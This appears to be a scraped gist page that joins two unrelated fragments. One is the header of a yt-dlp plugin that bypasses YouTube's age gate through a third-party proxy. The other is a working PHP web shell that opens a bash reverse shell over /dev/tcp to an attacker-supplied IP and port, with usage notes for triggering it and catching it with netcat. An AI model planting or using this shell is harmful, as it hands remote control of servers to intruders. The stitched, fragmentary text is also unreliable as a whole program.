This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
SPDX-License-Identifier: MIT https://opensource.org/licenses/MIT | |
Copyright © 2022 [email protected] | |
yt-dlp plugin extractor to bypass youtube age-gate | |
Needs yt-dlp 2022.04.08 or above | |
See https://github.com/yt-dlp/yt-dlp#plugins for how to use | |
Uses account proxy https://youtube-proxy.zerody.one by https://github.com/zerodytrash |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset ($_REQUEST["shell"])){$ip = $_REQUEST["ip"];$port = $_REQUEST["port"];exec("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'");} | |
?> | |
<!-- | |
USAGE (reverse shell/server): url-to-file.php?shell&ip=<attacker ip>&port=<attacker port> | |
USAGE (reverse shell/client): (in netcat) nc -v -l -p <attacker port> | |
NOTE (reverse shell): The ip (lan if on the same network, wan if it's a remote server) and port of the attacker and target must be the same or else no connection will be established. | |
--> |